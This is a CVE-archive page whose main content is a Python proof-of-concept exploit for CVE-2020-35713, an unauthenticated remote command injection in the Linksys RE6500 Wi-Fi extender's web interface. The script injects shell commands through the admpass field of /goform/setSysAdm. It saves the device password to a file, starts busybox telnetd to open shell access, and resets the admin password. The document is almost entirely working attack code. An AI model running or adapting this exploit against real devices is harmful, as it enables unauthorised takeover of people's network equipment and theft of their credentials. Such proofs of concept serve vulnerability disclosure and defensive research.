4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-35713
README.md
Rendering markdown...
POC / CVE-2020-35713.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python
#Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
#Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
#An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 
# Exploit Author: RE-Solver - https://twitter.com/solver_re
# Vendor Homepage: www.linksys.com
# Version: FW V1.05 up to FW v1.0.11.001
 
from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
ip="192.168.1.226"
 
command="nvram_get Password >/tmp/lastpwd"
#save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
 
r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prev password saved in /tmp/lastpwd")
    
command="busybox telnetd"
#start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
 
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Telnet Enabled")
    
#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prevent corrupting nvram - set a new password= admin")